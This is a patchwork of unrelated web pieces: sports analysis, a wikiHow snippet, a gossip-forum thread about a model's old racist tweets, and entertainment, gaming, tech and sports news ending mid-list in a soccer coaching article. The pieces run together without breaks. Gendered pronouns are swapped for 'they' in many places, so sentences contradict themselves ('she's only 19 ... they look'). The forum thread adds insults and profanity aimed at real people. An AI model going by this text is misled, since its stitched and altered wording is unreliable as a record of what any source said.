The 10th-best player in the N.B.A . at a given time has only about a 7 percent chance of winning a title , according to the model . And the 25th-best player — someone who might be the last reserve added to one of the conference All-Star teams — has about a 5 percent chance .
That is not much better than an N.B.A . player chosen at random , who has a 3.3 percent chance of becoming a champion by virtue of being on one of the 30 teams . A borderline All-Star in the N.B.A. , in other words , is much closer to being a role player than a superstar , at least when it comes to their odds of winning a championship .
James , of course , will have considerable freedom to pick their employer . If they put winning titles above all other considerations , they could sign on for any role with the team they perceived as having the best chance to win the championship in a given season .
Few players in N.B.A . history have been willing to take things to quite that extreme . Instead , superstars expect teams to build around them — even if they are past their prime , and even if it means something as inglorious as Jordan 's late years spent with the Washington Wizards .
One can forgive Jordan , who did not have anything left to prove . But to match him , James will need to win two or three more titles over the next several seasons while they still play at an M.V.P . level , which will require good health and some good luck . Then they may need to chase the last couple of titles by being willing to play the right role with the right club .
The wikiHow Video Team also followed the article 's instructions and validated that they work . This article was co-authored by our trained team of editors and researchers who validated it for accuracy and comprehensiveness . Together , they cited information from 15 references . wikiHow 's Content Management Team carefully monitors the work from our editorial staff to ensure that each article meets our high standards.The wikiHow Video Team also followed the article 's instructions and validated that they work .
In this Article : Article SummaryUsing Warm Water and Dish SoapCleaning Your Glasses on the GoFollowing an Eyewear Care RoutineCommunity Q & A15 References
Glasses are often an expensive investment , so it 's important to keep them in good shape . Fortunately , cleaning your glasses is quick and easy . The best way to clean eyewear is with warm water and dish soap , so head to the sink and lather them up ! When you 're out and about , touch up your lenses with a spray cleaner or wet wipes . If you stick to a daily cleaning routine , you 'll be seeing crystal clear and you 'll keep your glasses looking shiny and new .
Damn he 's so ugly Reply
Parent
Thread
Link
Ugly and chubby Reply
Parent
Thread
Link
Grotesque Reply
Parent
Thread
Link
do n't get the ppl who say he 's ugly . They may not be as hot as whatever token black guy ONTD wants to salivate over once every blue moon to prove their `` diverse taste '' .... but a couple of derp shots do not negate the fact that he 's attractive Reply
Parent
Thread
Expand
Link
They are sincerely so disappointed in Bella , lol . Reply
Parent
Thread
Link
I think I read somewhere a letter they wrote Bella telling them how they saw used condoms and tampons and drugs in the back of their car and was disgusted with her .. Reply
Parent
Thread
Expand
Link
the only real housewives i watch is atlanta but i constantly hear shes a stage mom . any examples besides the whole cake thing with gigi ? this family seems messy Reply
Parent
Thread
Expand
Link
this fucking asshole . fuck off yolanda . Reply
Parent
Thread
Link
who has the time to go through four year of tweets Replies
Thread
Link
I think people do twitter searches for certain keywords to find stuff like this . Reply
Parent
Thread
Link
Step one : Develop an agenda
Step two : Twitter Advanced Search Reply
Parent
Thread
Link
haha exactly this Reply
Parent
Thread
Link
social media is always the gift that keeps on giving 🙏🏾
why people do n't wipe their accounts , i 'll never know . even reading some of my past lj entries is enough for me to never want to be famous . Reply
Thread
Link
I used to be the type to tweet cryptic messages about my now fiancé when we would fight . Alsoall the shit I 'm sure I 've talked about other celebs in the past , I would definitely have to delete mine . Reply
Parent
Thread
Link
that 's why i really only have social media accounts to follow people and read their shit , not to post shit myself . Reply
Parent
Thread
Link
I only use Twitter for my work position ... I would never use it on a personal basis . The world does n't need to know my shit . Reply
Parent
Thread
Link
I need to find a service that still does that . I used to use Tweetcleaner or something and it worked great but now when I use those programs the tweets still show up in searches .
What does everyone else used to clean up their old tweets ? Reply
Parent
Thread
Expand
Link
or even just do n't post shitty things 2 begin with lol but ya IDK i wiped my fb account of anything before i was 18 to hide my shameful emo phase Reply
Parent
Thread
Link
Wow this is so surprising .. Reply
Thread
Link
A white woman is proven to be racist news at ll . Reply
Thread
Link
ik someone 's gon na reply to about the hadid 's being half pakistani , but according to those tweets they def . considers themselves a white girl .. Reply
Parent
Thread
Link
Palestinian not Pakistani . Reply
Parent
Thread
Expand
Link
IDK what they call themselves now but just because at 15 they called themselves white does n't mean that now they have n't embraced them being Palestanian . Reply
Parent
Thread
Expand
Link
I 'm sure they benefit from white privilege by them being white passing . I bet she 'll claim the other half once they get dragged for those past tweets and claim they that ca n't be racist because she 's half Pakistani . Reply
Parent
Thread
Link
lol @ everyone in this thread not even being able to differentiate between pakistani and palestinian . wow .
Edited at 2016-04-15 06:15 pm ( UTC ) Reply
Parent
Thread
Expand
Link
Lmaoooooo I 'm dying over the fact that @ glamforwoc nonchalantly tweeted this tea between a giveaway and a black hair tweet Reply
Thread
Link
A non black person participating in antiblackness ? Should I feel surprised or something ? Reply
Thread
Link
Yep , like why did I even click in here . Reply
Parent
Thread
Link
ifkr ? its just another day ending in y ... Reply
Parent
Thread
Link
ikr Reply
Parent
Thread
Link
yikes . how old was they when they made these tweets ? like 15/16 ?
im glad shes getting dragged , they deserve it , but something about the way they phrased that tweet makes me uncomfortable . `` is bending over for a black man '' ? of course that pales in comparison to the original tweets . Reply
Thread
Link
yeah i feel the same about that tweet Reply
Parent
Thread
Link
IA about that tweet . It makes it seem almost like a punishment ? Reply
Parent
Thread
Link
i can see how it sounds that way but i think It 's honestly just slang for fucking . though it definitely has a sub connotation
Edited at 2016-04-15 07:17 pm ( UTC ) Reply
Parent
Thread
Expand
Link
its very subservient phrasing , rather than saying shes in a relationship * with * so-and-so or that they are in a relationship * together * Reply
Parent
Thread
Link
ia im kinda annoyed that it 's acceptable in sj circles to say sexist things as long a its aimed at white women or cis women . Reply
Parent
Thread
Expand
Link
it is not ok and pretty much a snapshot of what people are like today Reply
Parent
Thread
Link
i 'm starting to feel really out of the loops because i 've never heard of this person and most of the people being posted here lol Reply
Thread
Link
things have gotten niche-ier and app-based so you got ta be active on certain social networks ( at the right time of day too when stuff breaks lol ) to be in the know now . IDK I 'm out of the loops too .
the guy is a music person from YouTube now Grammy winner . the gal is a model of technically famous parents . they and their friends are It people rn
Reply
Parent
Thread
Link
the most surprising thing about this is that she 's only 19. i s2g i always think she 's like 26. it 's crazy how old they look , i always thought they were the oldest hadid sibling rip Reply
Thread
Link
Me too they have a mature face
Edited at 2016-04-15 06:30 pm ( UTC ) Reply
Parent
Thread
Link
WAIT really ? ! ? ! ? ! i really thought they were older than gigi omg Reply
Parent
Thread
Link
Oh wow , I legit thought they were much older . Reply
Parent
Thread
Link
Seriously . They literally look double their age . I would have legit guessed they were 38 . How are they 19 ? ! ? ! ? ! Reply
Parent
Thread
Link
38 ? cmon now Reply
Parent
Thread
Expand
Link
I thought they were at least late 20s . My little sister said 25ish and the other said mid 30s , so yea they definitely do n't scream 19 . Reply
Parent
Thread
Link
i feel like she 'd look younger with their original nose and lips Reply
Parent
Thread
Link
shes only 19 ? ? ? now im wondering how old the weeknd is Reply
Parent
Thread
Link
I should n't be surprised but I kinda am and shit this is hard to follow on my damn phone . Reply
Thread
Link
Not surprised .
Also most 'celebs ' are dumb as fuck , especially all the Bella , Gigi , Kylie etc crowd . Only a few of them have had a proper education . They 've all grown up in this entitled so-far-removed-from reality world . Reply
Thread
Link
Kylie Jenner is a home-schooled graduate of Laurel Springs School in Ojai , California
that 's all people need to know about their stupidity Reply
Parent
Thread
Link
This year 's ninth issue of Shogakukan 's Weekly Shonen Sunday magazne is announcing on Wednesday that the KenIchi the Mightiest Disciple manga will bundle its second original video anime ( OVA ) in May . The 47th volume of the manga will be available that month in a set with the second OVA . More information about the second OVA will be provided in future issues of the magazine .
The same issue of Weekly Shonen Sunday also revealed that the beginning of the anime project will be posted before the first DVD 's release on the magazine 's Web Sunday site . The first OVA will be bundled with the 46th KenIchi the Mightiest Disciple manga volume on March 14 .
Shun Matsuena 's manga already inspired a television anime series that Funimation released in North America .
[ Via Manga News ]
Hey people ! !
With this pic I declare finished the Twidash month !
Here you have pic # 11 of my 30 day challenge , hosted by
DAY ELEVEN : WEARING KIGURUMIS
NOW , ABOUT THIS PIC : Squishy time ! ! What can I say ? I just wanted this to look adorable
Dash is a kitty and Twi is a bunny
Dash is a kitty and Twi is a bunny
On the following days , draw/write your OTP :
01 - Holding hands-
02 - Cuddling somewhere-
03 - Gaming/watching a movie-
04 - On a date-
05 - Kissing-
06 - Wearing eachothers ' clothes-
07 - Cosplaying-
11 - Wearing kigurumis
12 - Making out
13 - Eating icecream
14 - Genderswapped
15 - In a different clothing style ( Visual Kei , gyaru , lolita , ect . )
16 - During their morning ritual ( s )
17 - Spooning
18 - Doing something together ( this can be anything from watching tv to having sex . Just remember to tag appropriately . )
19 - In formal wear
20 - Dancing
21 - Cooking/baking
22 - In battle , side-by-side
23 - Arguing
24 - Making up afterwards
25 - Gazing into eachothers ' eyes
26 - Getting married
27 - On one of their birthdays
28 - Doing something ridiculous
29 - Doing something sweet
30 - Doing something hot ( once again , be sure to tag if you make it extremely NSFW ! )
Hope you like it , guys ! !
Kim out . Peace .
MLP belongs to ©2016 Lauren Faust and Hasbro
Art by ©2016 Akemi Shikima
VISIT MY BLOG VISIT MY BLOG artntips.wordpress.com/
COMMISSIONS ARE OPEN COMMISSIONS ARE OPEN
PLEASE HELP ME ON MY PATREON PLEASE HELP ME ON MY PATREON www.patreon.com/ShikimaAkemi
This was done with colored pencils- You 're here
The Walking Dead easily had the biggest presence at this year 's Comic-Con . However , because issue # 100 had just been released last week , the comic book panel was spoiler-free and we did n't hear too much about the Something to Fear story arc .
Thankfully , I had some one-on-one interview time with Robert Kirkman during the convention and talked to them specifically about The Walking Dead # 100 and the future of the comic book series . Continue reading to learn about a major character death that was supposed to happen earlier and find out who Robert Kirkman promises will not survive the series :
* * SPOILER WARNING * * There are major spoilers for those who have not read up to and including issue # 100 .
I wanted to start by talking about the major character death in The Walking Dead # 100 . Was it always the plan to kill this character in issue # 100 or did it happen more organically ?
Robert Kirkman : I had actually been planning to kill Glenn in issue # 75 , but felt that I had more to do with the guy . I found myself trying to shoehorn that into the storyline back when I was in the 60 's of the run . I plot what 's going to happen in the book , which people are going to die , and how they are going to die , but every now and then I throw myself a curve ball and change my mind .
The idea behind their death was just to portray it as such a random event . Negan is so dangerous because they can do anything to anyone at any time . To me it is terrifying to have a guy standing in front of you saying `` I 'm going to kill one of you .. I do n't know which one it 's going to be and I do n't really care ... ''
That 's horrifying and having Rick experience that and being powerless in front of this guy is really going to fundamentally change the book in huge ways . I think that makes Glenn one of the more important characters in the life of the series .
After having written Glenn for all of these years , was it difficult for you to kill him ? Do you feel the same connection or more of a connection to the characters than the readers do ?
Robert Kirkman : Yeah , it 's always difficult . It 's very hard for me to come to grips with the fact that I 'm never going to write another Abraham or Glenn story . Or the fact that I have n't been writing Tyrese or Axel , or even Shane who died very early on or Lori .
Both Charlie and I grow attached these characters and it affects us the same way it affects the readers . When I 'm writing scripts , I actually do become upset and sometimes it 's nerve-wracking because I plot everything out and I know what 's coming . When I 'm actually writing the script , I 'm experiencing the story in real time to some extent .
When Charlie reads the scripts , they like to keep things vague , so they do n't ask questions about what 's coming up . They gauge the series based on their reading of the script and how they experience it . He 's able to experience it fresh and it helps them move forward . It 's very emotional for all of us .
Looking ahead , do you know how you want Rick 's story to end ? If the series continues 10 or 20 years , and it always follows Rick , the stories would not have the same impact because readers would always know that Rick will survive . I 've heard you say in the past that Rick could die at any time . Is that still the case ?
Robert Kirkman : Yeah , Rick could go at any time . I think that Carl could carry the book now . I know that there are interesting stories I could do with him , Andrea , or Michonne . To a certain extent , I think it would be interesting to follow Negan for a little bit and see what that story would be like .
I definitely think that Rick has been the anchor for the series and may be the anchor of the series for a long time . I do have plans for them and I know where their story is going , but I promise that Rick will not survive the entire run of the book .
I think the book will go past 300 issues at this point . Charlie and I absolutely love what we 're doing and it is exactly the thing I have wanted to do ever since I wanted to do comics . I 'm having the time of my life . The book is going to go on for a long time and no one is safe ... not even Rick .
I feel like it will be harder for readers to sympathize with Rick at this point in the series . Now that Rick has decided to go on the offensive without discussing it with the entire group , he 's more responsible for the recent character deaths . Do you want readers to put more of the blame on them for the events that transpire during Something to Fear ?
Robert Kirkman : In life I think that sometimes you 're the hero or villain , depending on perspective . In telling Rick 's story realistically , you 're not always going to like him . When you deal with human interaction , people make mistakes or decisions without thinking and it 's certainly something I 'm trying to portray . There will be times when you hate Rick and times when you love Rick .
This is much in the same way that the story has very slow and quiet periods that make the explosive , violent , and terrifying periods seem that much more powerful . There will be periods where you absolutely hate Rick and do n't identify with him , but that will make the later period where you are completely behind the guy that more interesting . I think that the book can survive having a character that you ca n't really read some times , so I have a lot of fun messing with him .
I wanted to ask quickly about The Walking Dead FPS that was recently announced and follows the events that take place before the TV series with Daryl Dixon . Do you have any creative involvement in the story or game elements ?
Robert Kirkman : I am consulted about it and was made aware of it . The Telltale game is based on the comic book series and I have direct control over whether that exists and how it is produced . This is more of an AMC thing , but I think it 's going to be a lot of fun to shoot bolts from a crossbow at zombies as Daryl Dixon .
Before we wrap up , can you give our readers a tease of what they can expect in the next issues of Something to Fear ?
Robert Kirkman : Negan 's introduction was a huge moment and finding out what 's Rick 's reaction to that will be is going to be very interesting . You 're going to get a sense of where the series is going by the time you get to # 102 and I think people are going to be a little startled by what we 're doing . It 's going to be a new evolution in the stories we tell , and a new situation for Rick and the rest of the cast . It 's going to be really cool .
-- -- --
We 're not done with our exclusive coverage of The Walking Dead from Comic-Con . Keep an eye out for interviews with the cast and crew of The Walking Dead Season 3 later this week . Missed out on any of our recent coverage of The Walking Dead ? Check out the following articles :
Starting out , this deck plays like any other . Your early creatures , Augury Owl and Wall of Omens , will start up the library top decking manipulation and extra early game card draw . Do n't be shy casting your Remands and Path to Exile early , you will be getting them back later in the game with Archeomancer .
Upon turn three or four , you should have several other creatures in your hand , the real workhorses of the deck . When Flickerwisp comes into play , it can remove a creature from the game till the current turn is over . Flickering the Flickerwisp can make it return into play at the end of your turn , which then can exile an opponent 's creature till the end of their turn , making it unable to attack .
The other flying creature of the deck is Galepowder Mage is capable of attacking and doing the same , removing creatures from the board , both your opponent 's to allow for unblocked damage or your own which can trigger more come into play effects to your benefit .
Venser , the Sojourner the namesake of the deck , can net you additional flicker effects . Eventually , they can do even more , making your creatures unblockable or granting you game ending exile effects on their ultimate .
The match can grind down in two different ways . First , you can Cast Stonehorn Dignitary and manage to flicker it over and over . Doing so makes it impossible for your opponent to attack which results in your cherry picking damage at will with multiple flying creatures . The second way to win is flickering the previously mentioned Archeomancer to retrieve Remands and Path to Exiles repeatedly to clear the board of any potential threats .
Keep several things in mind while playing this deck . What you have in play is valuable to you . If your opponent targets it for removal , do n't be afraid to flicker it with spells like Momentary Blink or Turn to Mist . This removes the targeting of the spell from the creature and saves it from detrimental effects . Also remember that other permanents can be targeted by your flicker effects , like Temple of Enlightenment , Sejiri Refuge , Halimar Depths or even Detention Sphere . Whatever you can do to grind the game into a stall .
Other cards that could improve the deck to your tastes are Restoration Angel , Fiend Hunter , Blade Splicer and Wrath of God type board sweeper spells .
The Venser Flicker deck is currently $ 132 and is a bit more expensive than most budget decks you have seen here in the past . It 's an enjoyable and synergistic deck and tan take on higher tier kitchen table decks . In a tournament environment the deck can take some weaker rogue decks but is a step or two slow against the gambit of top tier decks .
Like Budget Magic or new to the game ? http : //paperchampion.net/
Want to share your budget Magic experience ? http : //www.reddit.com/r/budgetdecks/
Follow me https : //twitter.com/TheAiokii
Like me https : //www.facebook.com/thepaperchampionblog
Tony Iommi has once again said that they would n't rule out BLACK SABBATH recording new material or playing a one-off event .
BLACK SABBATH finished its year-long `` The End '' farewell tour on Saturday night ( February 4 ) in the band 's hometown of Birmingham , England , closing out the quartet 's groundbreaking 49-year career with an emotional 15-song set .
The band decided to make this tour its last because Iommi , who was diagnosed with cancer in late 2011 and is currently in remission , can no longer travel for extended amounts of time .
Speaking to the U.K. radio station Planet Rock , Iommi said : `` I 'm going to miss playing on stage because that has been my whole life , the band and playing on stage . I like [ playing on stage ] and I 'm sure it 's not going to end like that ; I 'm sure we might do a one-off show somewhere .
`` It 's just the touring for me — it 's time to stop roaming the world and be at home for a bit ... I 'm still going to write and put stuff out . ''
Asked if SABBATH 's recording days are truly over , Tony said : `` No , I do n't think we 've ruled anything out apart from me not wanting to tour any more on that scale , but who knows , we may do something . We have n't spoken about it . That 's another thing — we have n't talked about anything , really , that 's to do with what 's going to happen afterwards . But I 'm sure something can happen somewhere . ''
Tony added that they are looking forward to the new chapters ahead in their life . `` It 's nice just to take some time off and really think about it , '' they said . `` I 've been offered quite a lot of stuff at the moment . It 's quite exciting . There are lots of different things coming in , things I would never have thought , to be honest . It 's all there and needs some thought . I do n't want to rush into anything .
`` Thing is , when you 're touring , you 've got to go out for six , eight , twelve months or whatever and you 've got a schedule that you have to do . Now… if I want to do some TV for a month , I can do that . ''
The original lineup of SABBATH came together in 1969 with Iommi , Ozzy Osbourne on vocals , Geezer Butler on bass and Bill Ward on drums . That lineup recorded and toured through 1978 , and periodically reformed through the '90s and 2000s for live work .
They regrouped again in late 2011 for a new album and tour , although Ward dropped out after a few months over financial issues . SABBATH has used Ozzy 's regular touring drummer Tommy Clufetos since then for live work . RAGE AGAINST THE MACHINE 's Brad Wilk laid down the drum tracks on the album `` 13 '' , which came out in June 2013 .
Iommi and Butler have n't announced any specific post-SABBATH plans yet , but Osbourne is reportedly at work on a new album , and already has a pair of solo shows scheduled for this summer .
Chance the Rapper partnered with New Era to release three limited-edition Chicago White Sox caps last month . View Full Caption The Social Experiment
CHICAGO — Chance the Rapper put an end to weeks of anticipation Thursday night by releasing `` Coloring Book , '' their third solo mixtape and first since 2013 .
The lead song on the album is called `` All We Got , '' featuring Kanye West and the Chicago Children 's Choir .
The album also features other Chicago musicians like Towkio and Saba . Lil Wayne and Justin Bieber are also on the album .
LISTEN HERE : Chance The Rapper 's `` Coloring Book ''
The Chatham-based hip-hop star made the album available late Thursday after debuting the song `` Blessings '' on The Tonight Show with Jimmy Fallon Thursday .
Chance recorded their first mix tape , 10 Day , while serving a 10-day suspension as a senior at Jones College Prep High School in 2011 .
Since then he 's kept close to their Chicago roots , promoting local charitable causes and partnering with New Era to sell White Sox caps . Their most recent music video , for the song `` Angels , '' even shows them soaring between Downtown skyscrapers .
RELATED : Chance The Rapper : 'We Need A New Mayor , For Sure '
Posters for the new mixtape , until recently called `` Chance 3 '' have popped up all over the city , with the numeral replacing the Sox logo on their iconic cap .
For more neighborhood news , listen to DNAinfo Radio here :
Pencil is the companion device to the company 's free iPad sketching app Paper , which was born from the ashes of Microsoft 's Courier project . Rather than undergo any needless pairing operation , you simply have to hold the tip of the device onto the logo in the artist 's palette , and the technology will handle the rest , normally within about three seconds . The company promises that Paper will charge from empty in around 90 mins , and will , apparently , last for up to a month with `` normal use , '' whatever that is .
I 've never used it for anything more than doodling , since you 're only able to use a single , pen-style brush and the eraser before being required to pay for more functionality . If you introduce Pencil to the equation , then any and all features that are available in the app come alive . When we tried this the first time , a pop-up told us that the extra brushes , like blend , watercolor and marker would stop working as soon as we disconnected the device , although after turning off Bluetooth and restarting the iPad , those extra brushes are still working -- something we 'll take advantage of until the company inevitably fixes it . Naturally , the rubberized tip will still work as a stylus even when powered off , but you wo n't be able to take advantage of any of the other features until you activate it .
Like its transatlantic cousin , Pencil will also be getting the same pressure sensitivity update that US users will receive whenever Apple deigns to release iOS 8 -- which is expected at some point in the autumn . If you 'd like to snap up the hardware today , you can do so from Amazon , with the Graphite ( unibody aluminum ) version being priced at £50 and the Walnut ( hewn from sustainable wood ) at £65 . Admittedly , that 's a little pricer than if you , somehow , were able to snag them in the US , since the former is costs $ 60 ( £35 ) and the latter is $ 75 ( £44 ) , but just imagine that part of the extra fee is not having to deal with tedious missives from the HMRC .
The Baltimore Orioles are no strangers to small , talkative managers . They had perhaps the greatest of all time in Earl Weaver , who was known to hold forth on subjects ranging from the intricacies of the balk rule to Miss Alice Sweet 's tomato plants .
While there 's no substitute for the original , it 's nice to see that Buck Showalter is carrying on the family tradition . On Saturday , having just lost a game thanks in large part to Nelson Cruz 's five hits , Boston starter John Lackey called attention to Cruz 's 2013 PED suspension in a really oblique , haughty way : They started with “ I 'm not going to comment on him , ” and then went on to comment on him , stopping just short of ending their episode of pique with “ Bless their heart. ” If a sorority president at Wake Forest called out one of the Tri-Delts for their involvement in Biogenesis , that 's how she 'd do it .
Buck fired back on Sunday in great style : As Christ argued with the Pharisees , Buck suggested that Boston should get its own house in order . Then , like a skilled judoka , they transitioned into a discussion of Lackey 's own career renaissance and increased velocity at age 35 .
This sort of thing is hardly out of character for Showalter , though . What follows is a brief list , in no particular order , of Buck 's best button-pushing moments during their Baltimore tenure .
• After the Ravens won the Super Bowl , the NFL wanted the Orioles to move a home game so that Joe Flacco & Co. could begin the next season in Baltimore . Jets coach Rex Ryan suggested the Orioles should simply give up the home game , potentially one with playoff implications , so that it would be easier for NFL fans to park . It was NFL exceptionalism at its worst , and Buck telling Ryan to know their place felt most welcome .
• Buck sees through self-serving arguments in all sports : When the Yankees led the charge against Alex Rodriguez last year , they did so because an A-Rod suspension would save them from paying their preposterous salary for a season . Well , Showalter shared their thoughts on the richest team in baseball making a naked cash grab : “ If Bud lets them get away with that , they 're under the luxury tax . If they can reset , they can spend again , and I guarantee you in two years Matt Wieters is in New York . ”
• In fact , Buck has something of an egalitarian streak , at least when it comes to their AL East rivals . In April 2011 , they told Men 's Journal : “ I 'd like to see how smart Theo Epstein is with the Tampa Bay payroll . You got Carl Crawford 'cause you paid more than anyone else , and that 's what makes you smarter ? That 's why I like whipping their asses : It 's great , knowing those guys with the $ 205 million payroll are saying , ‘ How the hell are they beating us ? ' ”
• Nobody 's safe , though ; not even Buck 's own players . When Buck found out that minor leaguer Josh Hart did n't know who Frank Robinson was , they demanded Hart submits a one-page report the next day .
• The real winner , however , is the prank Buck and reliever Jim Johnson pulled on Darren O'Day in 2012 for MLB Fan Cave . O'Day was evidently fond of something called the Solowheel , which is a self-powered unicycle with no handlebars . They hired an actor to play a Wall Street Journal reporter who 'd come to the park to interview O'Day about the Solowheel , and while the right-hander was demonstrating it , Buck came out and read them the riot act for horsing around .
You do n't have to actually click most of these links to get the full effect of Showalter 's penchant for the bon mot , but you need to watch this video . Need to . O'Day looked like they were going to cry .
• Of course , if you dish all this out without being able to take it , you 're a jerk and not a hero . But do n't worry : Buck can laugh at himself , even when Mark Reynolds leaves them hanging on a high five .
Cheers for the little guy , moral arbiter , and man of good humor : Buck Showalter is truly a Renaissance man .
Ex-Colts pass rusher Dwight Freeney , shown celebrating a sack , is looking for a new team . ( Photo11 : Matt Detrich , USA TODAY Sports ) Story Highlights Indianapolis Colts career sack leader Dwight Freeney has been told they will not be re-signed by the team
Freeney said they expected to get a low offer , sign it and finish their career with the Colts
Headed for the open market , Freeney said they would love to play for the Giants , Jets or Patriots
Dwight Freeney expected to receive an offer from the Colts and finish their career in Indianapolis .
That did n't happen .
The team 's career sack leader is still trying to absorb the fact they will become an unrestricted free agent on March 12 after being informed last week they will not be re-signed .
`` I 'll be honest with you , I was surprised the way it happened , '' Freeney said in a telephone interview with USA TODAY Sports on Wednesday . `` I figured they would offer me something low , and I would just accept it , go the last few years and retire a Colt and that would be it .
`` That did n't happen . ''
So , now Freeney is planting seeds : In a Sirius XM NFL Radio interview Wednesday , they gushed about the possibility of playing in New York -- for the Jets and coach Rex Ryan , or for the Giants , where , after years of playing with Peyton Manning in Indianapolis , Freeney would join Peyton 's brother , Eli .
FAST HEALER : Lattimore ready for NFL
FOR REAL ? Te ' o says fake girlfriend wo n't hurt them
`` We 'll see , obviously , Rex is a great guy , I actually know Rex , I met them a few times , '' Freeney said . `` Playing in New York , that is obviously something that 's very attractive . Scheme-wise , I 'm sure Rex knows how to free guys up . That would be a good fit , but a lot of teams would be a good fit . I 'm an East Coast guy , it makes sense , it feels good but we 'll see the next few weeks whoare actually interested . ''
Playing for the Giants `` would be a dream , '' they said , given that `` I grew up a Giants fan , all my life . ''
They added : `` I think the biggest thing I 'm looking for is a contender , it does n't necessarily have to be a Super Bowl team -- at least it 's a team that is contending for the Super Bowl , in the playoffs and fits the things that I do . I played 11 years and I want to continue to win . I ca n't see myself going to a non-winner . ''
And if you 're thinking that Freeney would n't consider playing for the New England Patriots , the Colts ' archrivals , think again . In the free-agent market , everyone is a potential employer -- especially those ( like Bill Belichick ) who might be looking for a situational pass rusher .
`` A lot of my friends have brought that up ... that 's a great organization over there , they have won a lot of games , have a lot of great players , '' Freeney said . `` I would be honored to play for anybody , especially that type of organization . ''
Freeney said they were out of town and informed of the Colts ' decision in a conference call with owner Jim Irsay , general manager Ryan Grigson and coach Chuck Pagano . They admitted they were disappointed by their news .
`` I wo n't say there 's bitterness because I understand the business side of it , '' said Freeney , who turned 33 Tuesday . `` Jim took a chance on me and I have to be grateful for that . I 've had a long career in Indy , longer than most people in one place .
`` I just thought they would offer me something , but they did n't . So I guess I 'm a little disappointed . ''
The Colts made Freeney the 11th overall selection in the 2002 draft . In 11 seasons , they compiled a club-record 107 1/2 sacks — that 's tied for 21st in NFL history and if No . 5 among active players — and was selected to seven Pro Bowls .
Freeney is coming off one of their least productive seasons . They finished with 12 tackles and five sacks while dealing much of the season with a high ankle sprain and a position change . In Pagano 's 3-4 defense , Freeney was moved from defensive end to outside linebacker .
Irsay informed Freeney they would be added to the Ring of Honor at Lucas Oil Stadium when they retire .
That wo n't be anytime soon . Freeney insisted teams have shown an interest in him , even though discussions can not begin until free-agent opens March 12 .
`` I have a lot left in the tank , '' they said . `` I 'm still running to the ball very quickly and I still have my explosion .
`` I feel good right now . I 'm excited to bring my talents to whoever would love to have me . I 'm worried about getting to the right organization , a winning organization . ''
Mike Chapell writes for the Indianapolis Star . Follow them on Twitter @ mchappell51 .
Stephen Dunn/Getty Images Bob Bradley was dismissed as U.S. coach Thursday . Why now ? And what does it mean for the future of the team ? Bob Bradley was dismissed as U.S. coach Thursday . Why now ? And what does it mean for the future of the team ?
If blogs , Facebook , Twitter and all other manner of social media are anything to go by , it 's safe to say there 's a large and vociferous contingent of the U.S. national team fan base that desperately wants U.S. Soccer to hire a new head coach . In recent weeks , with the U.S. playing several unconvincing games during the 2011 CONCACAF Gold Cup , highlighted by a surprising 2-1 loss to Panama in the group stage and blowing a 2-0 lead in a humiliating 4-2 defeat to Mexico in the final , the online murmurs have escalated to a very audible chorus .
People want Bob Bradley 's head .
These folks are so fed up with Bradley 's conservative player selection and tactics that they consider lobbying for their sacking to be a worthwhile pastime . Most clamor for a big-name foreign coach to come in and right the ship .
But leaving aside the question of whether a big-time foreigner could draw an elevated performance from the same group of players whose abilities would n't magically change overnight , there are many flaws to the argument that axing Bradley would be the best solution . Before a name can be culled from the dozens that typically come up , the question has to be asked : Why would any top-level international coach want to take over the U.S. men 's national team ?
It 's all well and good fantasizing about a big-time management star leading the Yanks , but this assumes that this type of candidate would want to become the man in charge of a team that is heading into a challenging World Cup cycle .
So , to play devil 's advocate , here are eight reasons a big-name foreign coach could balk at the chance to succeed Bradley :
1 . The squad is aging
Of the core U.S. players , Tim Howard , Carlos Bocanegra and Steve Cherundolo are all 32 years old . Landon Donovan is 29 and Clint Dempsey is 28 . Only Michael Bradley and the oft-injured Stuart Holden are on the right side of the hill , at 23 and 25 , respectively .
More likely than not , this generation has already peaked . While conventional wisdom holds that the best years of a position player come between ages 28 to 32 , research presented in Simon Kuper and Stefan Szymanski 's book `` Soccernomics '' suggests that the mid-20s are the prime years . But whichever methodology you apply , the current core of the U.S. team will be on the wrong side of that equation by the 2014 World Cup .
2 . The future is murky
Having an aging core is fine if there is a next one ready to step in . And there is plenty of young talent in the U.S. player pool . But between them , the brightest of the prospects -- Juan Agudelo , Alejandro Bedoya , Teal Bunbury , Timmy Chandler , Mixx Diskerud , Eric Lichaj and Tim Ream -- have made all of 262 league appearances for their club teams and picked up 38 caps for the U.S. That averages out to 37.4 club and 5.4 international games . Or about one club-team regular season and six months ' worth of international friendlies .
To say that this bunch is unproven is an understatement . So taking the job on the back of their promise is a big risk .
3 . The upside is limited
Big-time managers do n't want to set themselves up to fail . Instead , they 'll often latch on to national teams with undervalued but highly skilled players -- the kind who , with a little coaching and motivation , can break out on the international stage together . All the better to make the new man in charge look like a genius in a short time span .
John Thys/AFP/Getty Images Some fans dream of a proven international coach like Guus Hiddink taking over the U.S. program .
Let 's take the king of unearthing those diamonds in the rough , Guus Hiddink , as a case study .
In 2001 , Hiddink took over South Korea and helped it reach the World Cup semifinals before leaving for PSV 18 months later . In mid-2005 , they were installed as Australia 's manager , and in their mere year at the helm , the team reached the second round of the World Cup . Next , Hiddink accepted the job of coaching the Russian national team , which they guided to the Euro semifinals just two summers later . Granted , Hiddink stuck around two years longer -- although they were temporarily in charge of Chelsea -- before being appointed as Turkey 's manager .
In each case -- perhaps with the exception of Turkey , which has struggled even under Hiddink -- there was untapped potential in the squad that was ready to break out in a big way .
The U.S. is not that kind of team right now . It 's either a mediocre side that has maxed out its potential , or it 's a rebuilding project four to eight years in the making . This alone should be enough to scare away most big-name managers -- at least the ones in their right minds and not driven solely by the weight of their wallet . Speaking of which &
4 . The pay is poor
The fact that the U.S. Soccer Federation sent Donovan and Dempsey to their respective sisters ' weddings in private jets between games earlier this month suggests it might have more money than it knows what to do with -- a sharp turnabout from its financial statement just two decades ago . But that is n't to say that U.S. Soccer will splash the cash on a coach . Federations like the U.S. typically fill their coffers by abiding by a simple rule -- do n't break the piggy bank by hiring an expensive coach and then running the potential risk of having to buy out their massive contract when it all turns sour .
From March 31 , 2009 , through April 1 , 2010 , Bob Bradley earned $ 600,000 in base salary and more in bonuses , pushing their take to $ 818,244 . Assuming he 's gotten a pay raise on their new contract , he 's probably still making under $ 1 million today .
Although there is no precedent for it , it 's not inconceivable that U.S. Soccer would offer a much fatter contract to a big-name successor . But that might still only barely cover the signing bonus of some decadent choice from the luminaries in the management ranks . Consider that at the time of last summer 's World Cup , England manager Fabio Capello was making a shade under $ 10 million per year . Five other managers pulled in around $ 2 million or so . Bradley did n't even crack the top 20 .
5 . The hours are long
